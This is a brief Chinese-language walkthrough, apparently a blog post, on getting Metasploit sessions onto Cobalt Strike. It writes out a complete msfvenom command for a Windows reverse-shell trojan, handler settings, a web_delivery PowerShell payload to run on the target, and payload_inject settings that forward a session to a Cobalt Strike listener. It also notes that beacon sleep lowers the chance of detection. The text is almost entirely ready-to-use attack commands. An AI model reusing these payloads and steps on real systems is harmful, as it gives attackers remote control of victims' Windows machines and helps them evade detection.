MSF上線CS
1.MSF運行exe上線
先用msfvenom生成一個木馬,這里是windows的木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload/msf.exe

然后到主機中運行exe
msf監聽得到session
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 exploit

2.powershell上線
使用powershell上線MSF
使用的不是msf中exploit/multi/handler模塊,而是使用的exploit/multi/script/web_delivery類
use exploit/multi/script/web_delivery set target 2 注意這里是 target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.255.128 set lport 6666 run

然后復制生成的powershell到windows主機中執行powershell

成功上線


啟動cs


MSF上使用payload_inject模塊
use exploit/windows/local/payload_inject 使用該模塊可以將 Metasploit 獲取到的會話注入到CS中 set DisablePayloadHandler true 用來禁用 Metasploit payload handler的監聽 因為要監聽到cs上 set lhost xxx CSIP set lport 7869 CS上的listen端口 set session 10 要轉發的session



成功上線cs

在interact交互的時候執行命令返回很慢,是因為cs自帶有sleep機制 這樣可以減少被檢測出的風險
可以通過sleep 1 調整休眠時間

然后再執行命令響應就很快了
